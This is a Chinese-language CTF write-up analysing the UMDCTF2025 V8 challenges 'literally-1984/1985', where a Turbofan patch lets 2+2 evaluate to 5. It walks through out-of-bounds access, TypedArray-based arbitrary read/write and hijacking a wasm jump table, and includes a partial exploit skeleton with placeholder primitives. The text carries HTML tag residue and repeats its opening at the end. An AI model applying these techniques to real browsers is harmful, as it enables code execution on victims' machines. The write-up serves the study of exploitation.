UMDCTF2025 V8漏洞利用分析：literally-1984\/1985<\/h1>

前言<\/h2>
本文详细分析UMDCTF2025中两道V8 CTF题目(literally-1984和literally-1985)的漏洞原理与利用技术。这两道题目本质上是相同的，1985只是1984的临时修复版，核心漏洞利用思路一致。<\/p>

漏洞分析<\/h2>

Patch分析<\/h3>

Part 1: Int32加法优化修改<\/h4>

修改文件：machine-operator-reducer.cc<\/code> 修改函数：MachineOperatorReducer::ReduceInt32Add(Node* node)<\/code><\/p>

关键修改：<\/p>


添加了特殊优化规则：当加法操作的两个操作数都是2时，直接返回5<\/li>
影响范围：Turbofan优化阶段的Javascript层面的2+2运算<\/li>
<\/ul>
Part 2: 边界检查修改<\/h4>
修改内容：<\/p>

将边界检查条件从if (v8_flags.turbo_typer_hardening)<\/code>改为if (v8_flags.turbo_typer_hardening && 2 + 2 == 5)<\/code><\/li>
由于源代码中的2+2不受Part1修改影响，这个条件永远为false<\/li>
结果：new_flags<\/code>永远不会拥有CheckBoundsFlag::kAbortOnOutOfBounds<\/code>标志位<\/li>
<\/ul>
CheckBoundsFlag::kAbortOnOutOfBounds<\/code>的作用：<\/p>

当数组访问越界时强制终止程序<\/li>
去除该标志后，越界访问不会触发错误终止<\/li>
<\/ul>
漏洞原理<\/h3>
结合两个patch：<\/p>

Javascript层面的2+2=5（通过Turbofan优化）<\/li>
禁用边界检查的强制终止<\/li>
<\/ol>
这使得我们可以：<\/p>

构造特定算术表达式绕过边界检查<\/li>
实现数组越界访问<\/li>
<\/ul>
漏洞利用<\/h2>
初始PoC构造<\/h3>
基础利用函数：<\/p>
function<\/span> test<\/span>() {
<\/span><\/span>    let<\/span> arr<\/span> =<\/span> [1.1<\/span>, 2.2<\/span>, 3.3<\/span>];
<\/span><\/span>    let<\/span> idx<\/span> =<\/span> 2<\/span> +<\/span> 2<\/span>; \/\/ 在Turbofan优化后变为5
<\/span><\/span><\/span><\/span>    return<\/span> arr<\/span>[idx<\/span>];
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>通过外层循环触发Turbofan优化后，可以成功泄露内存值。<\/p>
内存布局分析<\/h3>
越界访问泄露的内存包含：<\/p>

JSArray对象的map和properties域<\/li>
通过分析泄露值可以确定内存布局<\/li>
<\/ul>
越界访问扩展<\/h3>
通过乘法运算扩大越界范围：<\/p>
function<\/span> test<\/span>() {
<\/span><\/span>    let<\/span> arr<\/span> =<\/span> [1.1<\/span>, 2.2<\/span>, 3.3<\/span>];
<\/span><\/span>    let<\/span> idx<\/span> =<\/span> (2<\/span> +<\/span> 2<\/span>) *<\/span> 2<\/span>; \/\/ 优化后为5*2=10
<\/span><\/span><\/span><\/span>    return<\/span> arr<\/span>[idx<\/span>];
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>任意地址读写(AAR\/AAW)尝试<\/h3>
初始思路：<\/p>

覆盖elements指针实现任意地址读写<\/li>
但会遇到新的CHECK校验elements对象的map<\/li>
<\/ul>
解决方案：<\/p>

使用JSTypedArray替代常规数组<\/li>
利用其data_ptr<\/code>（base_pointer + external_pointer<\/code>）实现任意地址读写<\/li>
<\/ul>
JSTypedArray利用<\/h3>
JSTypedArray关键结构：<\/p>

data_ptr<\/code>直接指向数据存储空间<\/li>
无需满足特定对象结构<\/li>
可以通过越界读写覆盖base_pointer<\/code>和external_pointer<\/code><\/li>
<\/ul>
实现AAW\/AAR的步骤：<\/p>

通过越界访问修改JSTypedArray的长度和elements长度<\/li>
定位优化完成时机（通过检查长度变化）<\/li>
构造稳定的越界读写对象数组<\/li>
覆盖data_ptr<\/code>相关字段实现任意地址读写<\/li>
<\/ol>
执行流控制<\/h2>
Wasm实例分析<\/h3>
关键结构：<\/p>

wasm.Instance<\/code>对象包含trusted_data<\/code><\/li>
trusted_data<\/code>中的jump_table_start<\/code>指向RWX内存区域<\/li>
类似于glibc的PLT\/GOT结构<\/li>
<\/ul>
利用步骤<\/h3>


寻找真实汇编地址<\/strong>：<\/p>

正常调用一次wasm函数<\/li>
使用%DebugPrint()<\/code>找到函数真实代码地址（懒加载后）<\/li>
<\/ul>
<\/li>

记录shellcode偏移<\/strong>：<\/p>

计算shellcode距离原始jump_table_start<\/code>的偏移<\/li>
使用addrof()<\/code>和arb_read()<\/code>进行内存泄露<\/li>
<\/ul>
<\/li>

覆盖start_jump_table<\/strong>：<\/p>

关键点：必须在首次调用前完成覆盖<\/li>
一旦函数被调用过，覆盖将无效<\/li>
将jump_table_start<\/code>覆盖为shellcode地址<\/li>
<\/ul>
<\/li>
<\/ol>
Shellcode构造<\/h3>
使用JIT-Spray技术：<\/p>

通过浮点数构造shellcode<\/li>
利用Turbofan优化将浮点数编译为可执行代码<\/li>
<\/ul>
完整利用流程<\/h2>

触发Turbofan优化使2+2=5<\/li>
构造越界访问泄露内存信息<\/li>
创建JSTypedArray对象<\/li>
通过越界访问修改JSTypedArray属性<\/li>
实现稳定的任意地址读写原语<\/li>
准备wasm实例和shellcode<\/li>
覆盖wasm实例的jump_table_start<\/li>
首次调用wasm函数触发shellcode执行<\/li>
<\/ol>
优化后的EXP<\/h2>
\/\/ 触发2+2=5优化
<\/span><\/span><\/span><\/span>function<\/span> triggerOpt<\/span>() {
<\/span><\/span>    let<\/span> arr<\/span> =<\/span> [1.1<\/span>, 2.2<\/span>, 3.3<\/span>];
<\/span><\/span>    let<\/span> idx<\/span> =<\/span> 2<\/span> +<\/span> 2<\/span>;
<\/span><\/span>    return<\/span> arr<\/span>[idx<\/span>];
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ 构造越界访问
<\/span><\/span><\/span><\/span>function<\/span> buildOOB<\/span>() {
<\/span><\/span>    let<\/span> corrupting<\/span> =<\/span> [1.1<\/span>, 2.2<\/span>, 3.3<\/span>];
<\/span><\/span>    let<\/span> corrupted<\/span> =<\/span> [4.4<\/span>, 5.5<\/span>, 6.6<\/span>];
<\/span><\/span>    
<\/span><\/span>    function<\/span> test<\/span>() {
<\/span><\/span>        let<\/span> idx<\/span> =<\/span> (2<\/span> +<\/span> 2<\/span>) *<\/span> 2<\/span>; \/\/ 优化后为10
<\/span><\/span><\/span><\/span>        corrupted<\/span>[idx<\/span>] =<\/span> 0x41414141<\/span>; \/\/ 越界写入
<\/span><\/span><\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    \/\/ 触发优化
<\/span><\/span><\/span><\/span>    for<\/span> (let<\/span> i<\/span> =<\/span> 0<\/span>; i<\/span> <<\/span> 100000<\/span>; i<\/span>++<\/span>) {
<\/span><\/span>        test<\/span>();
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    return<\/span> {corrupting<\/span>, corrupted<\/span>};
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ 实现addrof原语
<\/span><\/span><\/span><\/span>function<\/span> addrof<\/span>(obj<\/span>) {
<\/span><\/span>    \/\/ 利用越界读取对象地址
<\/span><\/span><\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ 实现任意读
<\/span><\/span><\/span><\/span>function<\/span> arb_read<\/span>(addr<\/span>) {
<\/span><\/span>    \/\/ 通过修改JSTypedArray的data_ptr实现
<\/span><\/span><\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ 实现任意写
<\/span><\/span><\/span><\/span>function<\/span> arb_write<\/span>(addr<\/span>, value<\/span>) {
<\/span><\/span>    \/\/ 通过修改JSTypedArray的data_ptr实现
<\/span><\/span><\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ 主利用函数
<\/span><\/span><\/span><\/span>function<\/span> exploit<\/span>() {
<\/span><\/span>    \/\/ 1. 触发优化
<\/span><\/span><\/span><\/span>    for<\/span> (let<\/span> i<\/span> =<\/span> 0<\/span>; i<\/span> <<\/span> 100000<\/span>; i<\/span>++<\/span>) {
<\/span><\/span>        triggerOpt<\/span>();
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    \/\/ 2. 构造越界访问
<\/span><\/span><\/span><\/span>    let<\/span> {corrupting<\/span>, corrupted<\/span>} =<\/span> buildOOB<\/span>();
<\/span><\/span>    
<\/span><\/span>    \/\/ 3. 创建JSTypedArray
<\/span><\/span><\/span><\/span>    let<\/span> typedArray<\/span> =<\/span> new<\/span> Float64Array<\/span>(10<\/span>);
<\/span><\/span>    
<\/span><\/span>    \/\/ 4. 实现任意地址读写
<\/span><\/span><\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>    
<\/span><\/span>    \/\/ 5. 准备wasm实例
<\/span><\/span><\/span><\/span>    let<\/span> wasmCode<\/span> =<\/span> new<\/span> Uint8Array<\/span>([...]);
<\/span><\/span>    let<\/span> wasmModule<\/span> =<\/span> new<\/span> WebAssembly<\/span>.Module<\/span>(wasmCode<\/span>);
<\/span><\/span>    let<\/span> wasmInstance<\/span> =<\/span> new<\/span> WebAssembly<\/span>.Instance<\/span>(wasmModule<\/span>);
<\/span><\/span>    
<\/span><\/span>    \/\/ 6. 获取jump_table_start地址并覆盖
<\/span><\/span><\/span><\/span>    let<\/span> jump_table_addr<\/span> =<\/span> \/* 通过addrof和偏移计算 *\/<\/span>;
<\/span><\/span>    arb_write<\/span>(jump_table_addr<\/span>, shellcode_addr<\/span>);
<\/span><\/span>    
<\/span><\/span>    \/\/ 7. 触发执行
<\/span><\/span><\/span><\/span>    wasmInstance<\/span>.exports<\/span>.main<\/span>();
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>exploit<\/span>();
<\/span><\/span><\/code><\/pre>关键注意事项<\/h2>


首次调用规则<\/strong>：<\/p>

wasm函数的jump_table_start覆盖必须在首次调用前完成<\/li>
一旦函数被调用过，覆盖将不会影响执行流<\/li>
<\/ul>
<\/li>

内存对齐<\/strong>：<\/p>

所有内存操作需要注意对齐要求<\/li>
浮点数与整数的转换要正确处理<\/li>
<\/ul>
<\/li>

优化触发<\/strong>：<\/p>

确保足够次数的循环触发Turbofan优化<\/li>
可以通过检查结果验证优化是否生效<\/li>
<\/ul>
<\/li>

偏移计算<\/strong>：<\/p>

不同V8版本的偏移可能不同<\/li>
需要通过%DebugPrint()动态确定<\/li>
<\/ul>
<\/li>
<\/ol>
总结<\/h2>
本漏洞利用的关键点在于：<\/p>

利用Turbofan优化实现算术运算的异常行为<\/li>
结合边界检查的禁用实现越界访问<\/li>
通过JSTypedArray的data_ptr机制绕过常规数组的限制<\/li>
精确控制wasm实例的跳转表实现代码执行<\/li>
<\/ol>
这种利用方式展示了现代JIT引擎中类型混淆与优化器交互的复杂安全问题，对于理解V8引擎的安全机制具有重要意义。<\/p>

UMDCTF2025 V8漏洞利用分析：literally-1984\/1985<\/h1>

前言<\/h2> 本文详细分析UMDCTF2025中两道V8 CTF题目(literally-1984和literally-1985)的漏洞原理与利用技术。这两道题目本质上是相同的，1985只是1984的临时修复版，核心漏洞利用思路一致。<\/p>

漏洞分析<\/h2>

Patch分析<\/h3>

漏洞利用<\/h2>

执行流控制<\/h2>

前言<\/h2>
本文详细分析UMDCTF2025中两道V8 CTF题目(literally-1984和literally-1985)的漏洞原理与利用技术。这两道题目本质上是相同的，1985只是1984的临时修复版，核心漏洞利用思路一致。<\/p>